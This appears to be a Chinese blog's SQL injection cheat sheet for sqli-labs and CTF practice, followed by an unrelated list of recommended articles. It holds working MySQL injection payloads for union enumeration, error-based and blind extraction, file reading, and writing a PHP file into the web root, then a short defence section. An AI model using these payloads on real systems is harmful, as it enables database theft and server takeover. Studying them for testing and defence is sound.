nigo134
nigo134

SQL注入

注入流程:

1、判断注入类型:
	2-1、1的方式,判断出是数字型还是字符型
2、根据判断结果,闭合相关符号:
	1' --+
    1" #
    1' -- -
    1" %23
3、判断列数:
	1' order by 3#
4、判断回显位置:
	-1' union select 1,2#
5、获取当前数据库名称:
	-1' union select 1,database()#
6、获取所有数据库名称:
	-1' union select 1,group_concat(schema_name) from information_schema.schemata#
7、获取指定数据库下的表名:
	-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#
8、获取指定数据库下指定表的列名:
	-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#
9、获取数据:
	-1' union select 1,group_concat(flag) from sqli.flag#

分类:

从注入参数类型分:数字型注入、字符型注入、搜索型注入

从注入方法分:基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入

从提交方式分:GET注入、POST注入、COOKIE注入、HTTP头注入

table_schema     数据库
table_name        数据表
column_name    字段
information_schema.columns 查询表

----union 注入
获取当前数据库所有表:
1 union select 1,group_concat(distinct table_name),3 from information_schema.columns where table_schema=database()#
获取字段:
1 union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_name='users'#

----报错注入
@extractvalue(xml_documen,xpath_string)
' union select 1,extractvalue(1,concat(0x7e,(select version()))) #
----bool盲注
1' and (select ascii(substr((select table_name from information_schema.columns where table_schema=database() limit 0,1),1,1)))=999 #

----时间盲注:
select * from pet where age= 12 and if(1>0),sleep(2),0)

----宽字节注入;
%df'

----limit 注入:
select field from user where id=XXX order by id limit 1,1 procedure analyse (extractvalue(rand(),concat(0x3a,SQL注入代码)),1);

sql handler用法

mysql> handler info open;
mysql> handler info read first;  
+------+------+  
| name | age  |  
+------+------+  
| lisa | 27   |  
+------+------+  
1 row in set (0.00 sec)  
  
mysql> handler info read next;  
+------+------+  
| name | age  |  
+------+------+  
| tina | 25   |  
+------+------+  
1 row in set (0.00 sec)  
  
mysql> handler info read age=(25);  
+------+------+  
| name | age  |  
+------+------+  
| tina | 25   |  
+------+------+  
1 row in set (0.00 sec)  
  
mysql> handler info read age=(25) limit 2;  
+------+------+  
| name | age  |  
+------+------+  
| tina | 25   |  
| do   | 25   |  
+------+------+  
2 rows in set (0.00 sec)  
  
mysql> handler info read age=(27) limit 3;  
+-------+------+  
| name  | age  |  
+-------+------+  
| lisa  | 27   |  
| ricky | 27   |  
| lover | 27   |  
+-------+------+  
mysql> handler info close;

information_schema && 无列名绕过

MySQL5.7的新特性
由于performance_schema过于复杂,所以mysql在5.7版本中新增了sys schemma,
基础数据来自于performance_chema和information_schema两个库,
本身数据库不存储数据。
===sys.schema_auto_increment_columns--查表(含自增主键)
?id=-1' union all select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+

===schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer--查表(不含自增主键)
===无列名注入:
select * from user where id = -1 union all select * from (select * from user as a join user as b)as c;

DNSlog盲注

SQL注入_第1张图片

 SQL注入_第2张图片

mysql读写文件 

1、需要条件

secure_file_priv不为null

1、限制mysqld 不允许导入 | 导出
secure_file_priv=null或secure_file_priv

2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
secure_file_priv=/tmp/

3、不对mysqld 的导入 | 导出做限制
secure_file_priv=

具有高权限

1)读文件

load_file("D:\flag\1.txt") #文件路径需要转义一下

http://127.0.0.7/sql/sqli-labs-master/Less-1/index.php?id=-1' 
union select 1,load_file("D:\\1.txt"),3%23

2)写文件

into outfile "路径"

http://127.0.0.7/sql/sqli-labs-master/Less-7/?id=-1')) union select 1,"",3 
into outfile "D:\\phpStudy\\WWW\\sql\\sqli-labs-master\\Less-7\\1.php"%23

3)sqlmap读写

--file-read "路径"

--file-write "要写入的内容或所在文件路径" --file-dest "要写入的路径"

2、当secure_file_priv为NULL时的利用方法

set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/789.php';
select '';

防御:

1、对用户输入的特殊字符进行严格过滤,如’、”、<、>、/、*、;、+、-、&、|、(、 )、 and、or、 select.union.

2、使用参数化查询(PreparedStatement),避免将未经过滤的输入直接拼接到SQL查询语句中。

3、Web应用中用于连接数据库的用户与数据库的系统管理员用户的权限有严格的区分(如不能执行drop等),并设置Web应用中用于连接数据库的用户不允许操作其他数据库。

4、设置Web应用中用于连接数据库的用户对Web目录不允许有写权限。

5、使用Web应用防火墙。

你可能感兴趣的:(漏洞整理,sql注入)

  • linux提权:从入门,Linux提权:从入门到放弃 Kalu丁 linux提权:从入门
    日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。一下是我总结的一些提权方法。几点前提已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件内核漏洞提权提到脏牛,运维流下两行眼泪,我们留下两行鼻血。内
  • 2020 年 Github 上最牛的 Java 进阶教程及 Java 实战项目都在这里了! C陈三岁 javajavagithub开发语言面试架构
    写在前面大家都知道Github是一个程序员福地,这里有各种厉害的开源框架、软件或者教程。这些东西对于我们学习和进步有着莫大的进步,所以我有了这个将Github上非常棒的Java开源项目整理下来的想法。觉得不错的话,欢迎小伙伴们去star一波。很多小伙伴都不知道学习什么开源项目,这篇文章定能为你解决疑惑。不论你想要看Java教程方向的开源项目、Java实战项目、SpringBoot教程还是说想要看微
  • mycat双主高可用架构部署-MySQL5.7环境部署第一台 龙哥·三年风水 MySQL5.7.36分布式高可用架构mysql分布式
    MySQL5.7服务器IP是192.168.31.209及192.168.31.2101、192.168.31.209:3307实例部署a、配置文件mkdir-p/data/mysql/mysql3307/{data,logs}#创建MySQL数据及日志目录vi/data/mysql/mysql3307/my3307.cnf#配置文件整理[client]#password=your_passwor
  • 2019-01-29 陌上花7807
    许小妹公司:宁波市镇海承迪文具有限公司【日精进打卡第281天】一:【知~学习】1:《六项精进》诵读0遍共40遍2:《大学》诵读0遍共220遍【经典名句分享】命运不能妨碍我们的欢乐,让他来胁迫我们吧!我们还是要欢笑度日。只有傻瓜才不是这样。——高尔基二:【行及践行】1:修身(对自己)1.1坚持不发脾气;1.2坚持多喝水;2:齐家(对家人)2.1整理行李;3:建功(对工作)3.12018年度工龄补贴和
  • 年轻人最赚钱的工作 什么行业稀缺又赚钱 日常购物技巧呀
    在任何时代中,年轻人都是社会发展的主流,年轻人是充满活力与拼搏力的人群。下面我为大家整理了最能赚钱的年轻人都有哪些特质,一起来看看吧!高省APP佣金更高,模式更好,终端用户不流失。【高省】是一个自用省钱佣金高,分享推广赚钱多的平台,百度有几百万篇报道,也期待你的加入。古楼导师高省邀请码518518,注册送2皇冠会员,送万元推广大礼包,教你如何1年做到百万团队。一、什么是购物返利——高省简单说一下,
  • 我和我的孩子们--之大闺女儿 王翎菲Tea
    已经被很多次说成是她亲妈了,没办法这孩子和我长的太像了,认了吧。大闺女儿本姓杨,但是她经常向我飞刀,(说我胖!)于是有了一个江湖响亮的名字---小杨飞刀,刀刀毙命。后来发现这丫头不光飞我呀,谁她都飞,而且刀无虚发。丫头跟了我两年多了,初一来的,成绩一直不是那种飞快的提高,每次考试只能往前进步一名,一开始刚来的时候,她很急躁,雄心壮志的,总想快速提高,可是总有这样那样漏洞,做了很多技术,催眠、bar
  • 8月3日打卡:人生地图 绿地公园
    今天读到派克在他的《少有人走的路》中的一段话让我感悟颇深“我们对现实的观念就像是一张地图,凭借这张地图,我们同人生的地形、地貌不断妥协和谈判。地图准确无误,我们就能确定自己的位置,知道要到什么地方,怎样到达那里;地图漏洞百出,我们就会迷失方向。”为什么人到中年后会有那么多的不如意和焦虑?其中一个重要的因素是过了青春期,就放弃了绘制地图。大多数人过了中年,就自认为地图完美无缺,世界观没有任何瑕疵。甚
  • Web安全之CSRF攻击详解与防护 J老熊 JavaWeb安全web安全csrf安全java面试运维
    在互联网应用中,安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造(Cross-SiteRequestForgery,CSRF),是一种常见的Web安全漏洞。通过CSRF攻击,黑客可以冒用受害者的身份,发送恶意请求,执行诸如转账、订单提交等操作,导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法,结合电商交易系统的场景给出错误和正确的示范代码,并分析常见的安全问题与解决方案,
  • 一起学语文:一文告诉你高中如何记笔记效率最高? 一起学语文
    本文主要是两个部分:一是如何记笔记,分为目的、记什么、误区、小技巧;二是如何归纳整理,分为整理知识体系的四个问题、不同级别的人怎样整理、常见的归纳整理方法。最后推荐康奈尔笔记法及语文学科的思维导图。记笔记的目的1.记忆记笔记最基本的一个作用,就是再一次加深你对内容的记忆。古人也说“手抄一遍,胜读十遍”不是没道理的,在我们运用多种感知器官同时投入识记的效果好,而多种感知又以手到为佳。2.复习便于阶段
  • 【牛犇马拉松】D116+生活好难 悦惜恒妍
    2021.06.25生活真的好难,好好生活更难,精致生活更是难上加难!要好好工作,让工作不仅只为获取收入,有端正积极的态度,对未来有规划……也要好好生活,,保证身体健康是基础,要让生活有乐趣,有品味,会烹饪,会穿搭,保持自律,保持好身材,懂收纳,整理,清洁,会做家庭规划,财务规划……还要让生活更有品质,就光是整理,收纳,穿着方面,就让人头疼!物品选择,让家更和谐,舒适!服饰,鞋包,配饰……喜欢好的
  • 软考-常见的23种设计模式整理 ppliu600 软件架构数据仓库数据库数据挖掘
    参考:23种设计模式总结设计模式可以将复用别人的解决方案。一、设计模式的分类创建型模式,共5种:单例模式、工厂方法模式、抽象工厂模式、建造者模式、原型模式。结构型模式,共7种:适配器模式、组合模式、代理模式、享元模式、外观模式、桥接模式、装饰器模式、行为型模式,共11种:观察者模式、策略模式、模板方法模式、迭代子模式、责任链模式、命令模式、备忘录模式、状态模式、访问者模式、中介者模式、解释器模式。
  • 2018-08-25 BOOpan
    潘蔚~常州新日催化剂有限公司【日精进打卡第二十八天】【知~学习】《六项精进》1遍共50遍《大学》1遍共53遍【经典名句]实践出真知【行~实践】一、修身:1、读书~《活法》二、齐家:(对家庭和家人)1、回家看女儿、父母三、建功:(对工作)1、数据整理{积善}:发愿从2018年7月29日起1年内365善事。今日1善,累计39善。【省~觉悟】不能拖沓【感谢】感谢妈妈做的丰盛的晚餐【志愿】努力让自己成为更
  • 《犯规唐予沫宋均廷》犯规小说全文免费阅读【完整章节】 云轩书阁
    《犯规唐予沫宋均廷》犯规小说全文免费阅读【完整章节】主角:唐予沫,宋均廷简介:唐予沫犯规了。她忘记自己跟宋均廷的交集,仅止于男女之间各取所需,其他多一个字都是废话。关注微信公众号【约精灵】去回个书號【2804】,即可免费阅读【犯规】小说全文!唐予沫哪里敢接话,低头整理资料。张盈盈毫不掩饰嘲讽:“我之前还真是小瞧了你。不过大老板就这么一个宝贝儿子,你想攀上枝头变凤凰简直是痴心妄想。”唐予沫依然当作没
  • 旧版中 pytorch.rfft 函数与新版 pytorch.fft.rfft 函数对应修改问题 带鱼的鱼香肉丝 pytorchPythonpytorchpythonfft
    旧版中pytorch.rfft函数与新版pytorch.fft.rfft函数对应修改问题前言一、旧版pytorch.rfft()函数解释二、新版pytorch.fft.rfft()函数解释三、总结前言这两天整理谱池化操作,需要用到傅里叶变换这个函数。后来提升了pytorch的版本以后,发现之前的torch.rfft()函数在新版的pytorch中使用会报错,后来查阅资料,发现是新版的参数有些变动。
  • 【实践出真知】使用Docusaurus将md文档组织起来就是一个网站(写API文档,写教程、写日记、写博客的有福了) IT里的交易员 Python经验池node.js产品运营经验分享
    文章目录前言一、Docusaurus是什么?二、一键生成网站框架并预览1.系统需求2.脚手架项目网站(一键生成网站框架)3.生成的目录内容4.网站运行与展示总结前言前段时间,学习Flet,访问到Flet中文网,被其简洁的风格吸引,就想着以后将自己的内容也整理一下。最终发现该网站是用Docusaurus这个工具实现的。以后写API文档,写教程、写日记、写博客有福了,只要写出markdown文档即可。
  • 微习惯复盘与感恩日记2022-04-30 小木山庄的溜溜
    微习惯复盘:1、写论文15分钟:跟导师聊了一个小时,知道了接下来应该怎么做。整理了导师的指导和经验。又学了一点stata,还没学完,看来要明天才能学完了。2、看文献15分钟:无。3、阅读正经书15分钟:《你的身体是一切美好的开始》。看一些关于健康的书,让自己健康起来。4、写小说15分钟:报名了无戒学堂的马拉松,激励自己完成豆瓣马拉松吧。虽然今天也没有写小说,已经三天没有写了。没关系,明天一定写!5
  • 出游 小郑_b188
    带上自己常用的包,放一本本子,打算写一段文字,再备一个包,里面放上书一本,扑克一幅,充电器两个,我一个,谢帅哥一个,小公主的步步高平板电脑,再带上专配充电器,一袋铂金脆饼,一件小公主的外套,小公主的水壶,小公主的病历和书,一点点水果,准备完毕。坐上车,头很胀很胀,摸摸额头,比手的温度高,车里的空气让我觉得透不过气,那空气让我觉得恶心,我想舒服的躺着睡一觉。晃晃悠悠,大概过了两小时,到达目的地,整理
  • 云WAF防御简介之0day攻击 亿林科技网络安全 安全网络web安全
    0day攻击简介0day攻击,也称为零日攻击,是指利用软件或系统中未被公开或未被修复的安全漏洞进行的攻击。这种攻击通常由黑客在发现漏洞后立即利用,而软件开发商可能还没有来得及发布相应的补丁来修复这些漏洞。0day攻击的特点0day攻击的特点包括其隐蔽性和危害性。由于漏洞尚未被发现或修补,攻击者可以轻易地利用这些漏洞获取敏感信息、破坏系统、篡改数据等,给目标系统带来严重的损失。防范0day攻击的建议
  • 如何在Python中处理不平衡数据 葡萄_ac1c
    Index1、到底什么是不平衡数据2、处理不平衡数据的理论方法3、Python里有什么包可以处理不平衡样本4、Python中具体如何处理失衡样本印象中很久之前有位朋友说要我写一篇如何处理不平衡数据的文章,整理相关的理论与实践知识(可惜本人太懒了,现在才开始写),于是乎有了今天的文章。失衡样本在我们真实世界中是十分常见的,那么我们在机器学习(ML)中使用这些失衡样本数据会出现什么问题呢?如何处理这些
  • Coding and Paper Letter(十四) G小调的Qing歌
    资源整理。1Coding:1.R语言包ungeviz,ggplot2的拓展包,专门用来作不确定性的可视化。ungeviz2.计算机图形学相关开源项目。计算机图形学光线追踪开源项目C++源码。computergraphicsraytracing计算机图形学格网开源项目C++源码。computergraphicsmeshes计算机图形学介绍开源项目。computergraphics3.R语言包GLMM
  • 【数据获取与读取】JSON & CSV yogurt=b 数据分析jsonpython
    数据分析流程获取数据-读取数据-评估数据-清洗数据-整理数据-分析数据-可视化数据公开数据集飞桨(百度旗下深度学习平台)数据集:https:/aistudio.baidu.com/aistudio/datasetoverview天池(阿里云旗下开发者竞赛平台):https:/tianchiaiyun.com/dataset/和鲸社区(数据科学开源社区)数据集:htps://www.heywhale
  • 30岁的女性创业适合做些什么? 氧惠超好用
    创业是一种需要创业者及其创业搭档组织经营管理、运用服务、技术、器物作业的思考、推理和判断的行为。以下是小编为大家整理30岁的女性创业适合做些什么相关内容,仅供参考,希望能够帮助大家!家庭园艺DIY“小花农”是一种DIY产品(自动动手做的意思)。家庭园艺DIY产品在市场上的面孔比较新,但符合市场需求。譬如“小花农”看上去只是一个罐子,但是里面已经配好了种子、花泥、花肥,只要定时浇水,种子就开始发芽、
  • {MC}唐缘出山与303相遇 恋蝶0126
    今天又得出山了,唐缘边整理衣着边抱怨,这时,抹茶走进来,“汤圆,你的外衣。”“谢了。”唐缘走到门口,抹茶锁上门,唐缘手中形成了一个能量球,一扔,能量球变成了好几个巨大的雪怪和数万个小雪球,小雪球飞起来,四处巡逻。雪怪则是在门口和花园周围站着。唐缘走在街道上,抹茶在身旁四处看看有什么需要买的。今天唐缘穿的不是古装,而是一件白色蓝条纹连衣衫,下面穿着白色牛仔裤,穿着蓝色帆布鞋。头发扎成单马尾,插了个玉
  • 今日复盘,明日计划(004) 遇见斌斌
    时间投资评估:(一)今天做了什么?1.写信。2.阅读。3.工作。4.复盘。5.静坐。6.补觉。(二)所做的事情分别有什么产出?1.整理自己,链接朋友。2.对理财投资有更深的认知,明确了自己当前的瓶颈在哪里。3.挣得生活费和理财本金。4.对自己和世界的认知,越来越清晰了些。5.提升专注度。6.提升精力。(三)做这些事,分别花了多长时间。按问题一的事件,分别是:1.写信投资45分钟。2.阅读投资1.7
  • 北京专利申请的基本流程是怎样的? 尚标知识产权
    这些年对于知识产权大家都很重视,国家也出了不少政策鼓励发明创造。申请专利是保护发明人技术的一种最有效手段,关于北京专利申请的一些流程,尚标知识产权整理如下:一、发明专利的受理阶段:如果符合受理条件,专利局将确定申请日,给予申请号,并且核实过文件清单后,发出受理通知书,通知申请人。如果是电子提交的申请,一般情况下会在2-3个工作日收到电子版受理通知书和缴纳申请费通知书/费用减缓审批通知书。二、专利的
  • 反序列化漏洞 Slash_HK web安全相关php安全web安全
    JavaPHP反序列化总结文章目录一.PHP反序列化1.序列化serialize()2.反序列化unserialize()二.反序列化漏洞1.漏洞利用Magicfunction2.漏洞利用思路三._construct()的利用2.利用普通成员类方法四.PHP反序列化漏洞总结1.CVE-2016-7124一.PHP反序列化1.序列化serialize()首先我们创建了一个对象,通过serialize
  • 5.4~5.10复盘和5.11~5.17计划 爱吃榴莲的薄荷
    上周计划总结:Catherine:1.10点半睡觉(最少5天):周一✅周二❎周三❎周四✅周五❎周六❎周日❎2.泡脚(最少5天):周一✅周二❎周三✅周四❎周五✅周六❎周日✅3.晚上继续不加班周一✅周二✅周三✅周四✅周五✅周六✅周日✅4.每天8000步:周一❎周二✅周三✅周四❎周五❎周六❎周日❎5.完成MBA作业提交✅6.整理衣柜周二✅7.看完一本书(激荡三十年)❎,看完Lily:1.每天十一点前睡觉
  • 鸿蒙(HarmonyOS)应用层开发知识点汇总 OH五星上将 移动开发鸿蒙开发HarmonyOSharmonyos鸿蒙开发移动开发分布式arkui组件化性能优化
    由于不少粉丝朋友反馈,说网上的有些知识点记录的比较杂乱,学习起来很费时间!小编下面针对【鸿蒙】应用开发中的一些技术点做的整理归纳,希望下面的能够有效的帮助到大家:基础组件基础组件(text开发)基础组件(input开发)基础组件(button开发)基础组件(picker开发)基础组件(image开发)基础组件(image-animator开发)基础组件(rating开发)基础组件(slider开发
  • Python学习笔记(三):列表的定义、访问及修改 RANDY_Sw Python入门python
    今天学习了有关列表的定义、访问及修改的方法,在此整理一下。列表的定义与访问name_list=['zhangsan','lisi','wangwu']#创建一个列表name_list[0]='xiaobai'#修改列表中的单个元素print(name_list)#遍历的方式打印列表1foriteminname_list:print(item)#遍历的方式打印列表2i=0foriinrange(le
  • XSS和sql注入部分场景测试用例样例 谷隐凡二 测试xsssql测试用例
    目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息,不应允许
  • 解读Servlet原理篇二---GenericServlet与HttpServlet 周凡杨 javaHttpServlet源理GenericService源码
    在上一篇《解读Servlet原理篇一》中提到,要实现javax.servlet.Servlet接口(即写自己的Servlet应用),你可以写一个继承自javax.servlet.GenericServletr的generic Servlet ,也可以写一个继承自java.servlet.http.HttpServlet的HTTP Servlet(这就是为什么我们自定义的Servlet通常是exte
  • MySQL性能优化 bijian1013 数据库mysql
            性能优化是通过某些有效的方法来提高MySQL的运行速度,减少占用的磁盘空间。性能优化包含很多方面,例如优化查询速度,优化更新速度和优化MySQL服务器等。本文介绍方法的主要有:         a.优化查询         b.优化数据库结构  
  • ThreadPool定时重试 dai_lm javaThreadPoolthreadtimertimertask
    项目需要当某事件触发时,执行http请求任务,失败时需要有重试机制,并根据失败次数的增加,重试间隔也相应增加,任务可能并发。 由于是耗时任务,首先考虑的就是用线程来实现,并且为了节约资源,因而选择线程池。 为了解决不定间隔的重试,选择Timer和TimerTask来完成 package threadpool; public class ThreadPoolTest {
  • Oracle 查看数据库的连接情况 周凡杨 sqloracle 连接
    首先要说的是,不同版本数据库提供的系统表会有不同,你可以根据数据字典查看该版本数据库所提供的表。 select * from dict where table_name like '%SESSION%'; 就可以查出一些表,然后根据这些表就可以获得会话信息 select sid,serial#,status,username,schemaname,osuser,terminal,ma
  • 类的继承 朱辉辉33 java
    类的继承可以提高代码的重用行,减少冗余代码;还能提高代码的扩展性。Java继承的关键字是extends 格式:public class 类名(子类)extends 类名(父类){ } 子类可以继承到父类所有的属性和普通方法,但不能继承构造方法。且子类可以直接使用父类的public和 protected属性,但要使用private属性仍需通过调用。 子类的方法可以重写,但必须和父类的返回值类
  • android 悬浮窗特效 肆无忌惮_ android
    最近在开发项目的时候需要做一个悬浮层的动画,类似于支付宝掉钱动画。但是区别在于,需求是浮出一个窗口,之后边缩放边位移至屏幕右下角标签处。效果图如下:   一开始考虑用自定义View来做。后来发现开线程让其移动很卡,ListView+动画也没法精确定位到目标点。   后来想利用Dialog的dismiss动画来完成。   自定义一个Dialog后,在styl
  • hadoop伪分布式搭建 林鹤霄 hadoop
    要修改4个文件    1: vim hadoop-env.sh  第九行    2: vim core-site.xml            <configuration>     &n
  • gdb调试命令 aigo gdb
    原文:http://blog.csdn.net/hanchaoman/article/details/5517362   一、GDB常用命令简介   r run 运行.程序还没有运行前使用 c             cuntinue 
  • Socket编程的HelloWorld实例 alleni123 socket
    public class Client { public static void main(String[] args) { Client c=new Client(); c.receiveMessage(); } public void receiveMessage(){ Socket s=null; BufferedRea
  • 线程同步和异步 百合不是茶 线程同步异步
    多线程和同步 : 如进程、线程同步,可理解为进程或线程A和B一块配合,A执行到一定程度时要依靠B的某个结果,于是停下来,示意B运行;B依言执行,再将结果给A;A再继续操作。 所谓同步,就是在发出一个功能调用时,在没有得到结果之前,该调用就不返回,同时其它线程也不能调用这个方法   多线程和异步:多线程可以做不同的事情,涉及到线程通知     &
  • JSP中文乱码分析 bijian1013 javajsp中文乱码
            在JSP的开发过程中,经常出现中文乱码的问题。         首先了解一下Java中文问题的由来:         Java的内核和class文件是基于unicode的,这使Java程序具有良好的跨平台性,但也带来了一些中文乱码问题的麻烦。原因主要有两方面,
  • js实现页面跳转重定向的几种方式 bijian1013 JavaScript重定向
            js实现页面跳转重定向有如下几种方式: 一.window.location.href <script language="javascript"type="text/javascript"> window.location.href="http://www.baidu.c
  • 【Struts2三】Struts2 Action转发类型 bit1129 struts2
     在【Struts2一】 Struts Hello World http://bit1129.iteye.com/blog/2109365中配置了一个简单的Action,配置如下   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configurat
  • 【HBase十一】Java API操作HBase bit1129 hbase
    Admin类的主要方法注释:   1. 创建表 /** * Creates a new table. Synchronous operation. * * @param desc table descriptor for table * @throws IllegalArgumentException if the table name is res
  • nginx gzip ronin47 nginx gzip
    Nginx GZip 压缩 Nginx GZip 模块文档详见:http://wiki.nginx.org/HttpGzipModule 常用配置片段如下: gzip on; gzip_comp_level 2; # 压缩比例,比例越大,压缩时间越长。默认是1 gzip_types text/css text/javascript; # 哪些文件可以被压缩 gzip_disable &q
  • java-7.微软亚院之编程判断俩个链表是否相交 给出俩个单向链表的头指针,比如 h1 , h2 ,判断这俩个链表是否相交 bylijinnan java
    public class LinkListTest { /** * we deal with two main missions: * * A. * 1.we create two joined-List(both have no loop) * 2.whether list1 and list2 join * 3.print the join
  • Spring源码学习-JdbcTemplate batchUpdate批量操作 bylijinnan javaspring
    Spring JdbcTemplate的batch操作最后还是利用了JDBC提供的方法,Spring只是做了一下改造和封装 JDBC的batch操作: String sql = "INSERT INTO CUSTOMER " + "(CUST_ID, NAME, AGE) VALUES (?, ?, ?)";
  • [JWFD开源工作流]大规模拓扑矩阵存储结构最新进展 comsci 工作流
        生成和创建类已经完成,构造一个100万个元素的矩阵模型,存储空间只有11M大,请大家参考我在博客园上面的文档"构造下一代工作流存储结构的尝试",更加相信的设计和代码将陆续推出.........     竞争对手的能力也很强.......,我相信..你们一定能够先于我们推出大规模拓扑扫描和分析系统的....
  • base64编码和url编码 cuityang base64url
    import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.PrintWriter; import java.io.StringWriter; import java.io.UnsupportedEncodingException;
  • web应用集群Session保持 dalan_123 session
    关于使用 memcached 或redis 存储 session ,以及使用 terracotta 服务器共享。建议使用 redis,不仅仅因为它可以将缓存的内容持久化,还因为它支持的单个对象比较大,而且数据类型丰富,不只是缓存 session,还可以做其他用途,一举几得啊。1、使用 filter 方法存储这种方法比较推荐,因为它的服务器使用范围比较多,不仅限于tomcat ,而且实现的原理比较简
  • Yii 框架里数据库操作详解-[增加、查询、更新、删除的方法 'AR模式'] dcj3sjt126com 数据库
        public function getMinLimit () {        $sql = "...";        $result = yii::app()->db->createCo
  • solr StatsComponent(聚合统计) eksliang solr聚合查询solr stats
    StatsComponent 转载请出自出处:http://eksliang.iteye.com/blog/2169134 http://eksliang.iteye.com/ 一、概述        Solr可以利用StatsComponent 实现数据库的聚合统计查询,也就是min、max、avg、count、sum的功能   二、参数
  • 百度一道面试题 greemranqq 位运算百度面试寻找奇数算法bitmap 算法
    那天看朋友提了一个百度面试的题目:怎么找出{1,1,2,3,3,4,4,4,5,5,5,5}  找出出现次数为奇数的数字.   我这里复制的是原话,当然顺序是不一定的,很多拿到题目第一反应就是用map,当然可以解决,但是效率不高。   还有人觉得应该用算法xxx,我是没想到用啥算法好...!   还有觉得应该先排序...   还有觉
  • Spring之在开发中使用SpringJDBC ihuning spring
      在实际开发中使用SpringJDBC有两种方式:   1. 在Dao中添加属性JdbcTemplate并用Spring注入;     JdbcTemplate类被设计成为线程安全的,所以可以在IOC 容器中声明它的单个实例,并将这个实例注入到所有的 DAO 实例中。JdbcTemplate也利用了Java 1.5 的特定(自动装箱,泛型,可变长度
  • JSON API 1.0 核心开发者自述 | 你所不知道的那些技术细节 justjavac json
    2013年5月,Yehuda Katz 完成了JSON API(英文,中文) 技术规范的初稿。事情就发生在 RailsConf 之后,在那次会议上他和 Steve Klabnik 就 JSON 雏形的技术细节相聊甚欢。在沟通单一 Rails 服务器库—— ActiveModel::Serializers 和单一 JavaScript 客户端库——&
  • 网站项目建设流程概述 macroli 工作
    一.概念 网站项目管理就是根据特定的规范、在预算范围内、按时完成的网站开发任务。 二.需求分析 项目立项   我们接到客户的业务咨询,经过双方不断的接洽和了解,并通过基本的可行性讨论够,初步达成制作协议,这时就需要将项目立项。较好的做法是成立一个专门的项目小组,小组成员包括:项目经理,网页设计,程序员,测试员,编辑/文档等必须人员。项目实行项目经理制。 客户的需求说明书   第一步是需
  • AngularJs 三目运算 表达式判断 qiaolevip 每天进步一点点学习永无止境众观千象AngularJS
    事件回顾:由于需要修改同一个模板,里面包含2个不同的内容,第一个里面使用的时间差和第二个里面名称不一样,其他过滤器,内容都大同小异。希望杜绝If这样比较傻的来判断if-show or not,继续追究其源码。 var b = "{{", a = "}}"; this.startSymbol = function(a) {
  • Spark算子:统计RDD分区中的元素及数量 superlxw1234 sparkspark算子Spark RDD分区元素
    关键字:Spark算子、Spark RDD分区、Spark RDD分区元素数量     Spark RDD是被分区的,在生成RDD时候,一般可以指定分区的数量,如果不指定分区数量,当RDD从集合创建时候,则默认为该程序所分配到的资源的CPU核数,如果是从HDFS文件创建,默认为文件的Block数。   可以利用RDD的mapPartitionsWithInd
  • Spring 3.2.x将于2016年12月31日停止支持 wiselyman Spring 3
                  Spring 团队公布在2016年12月31日停止对Spring Framework 3.2.x(包含tomcat 6.x)的支持。在此之前spring团队将持续发布3.2.x的维护版本。          请大家及时准备及时升级到Spring
  • fis纯前端解决方案fis-pure zccst JavaScript
    作者:zccst FIS通过插件扩展可以完美的支持模块化的前端开发方案,我们通过FIS的二次封装能力,封装了一个功能完备的纯前端模块化方案pure。 1,fis-pure的安装 $ fis install -g fis-pure $ pure -v 0.1.4 2,下载demo到本地 git clone https://github.com/hefangshi/f
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他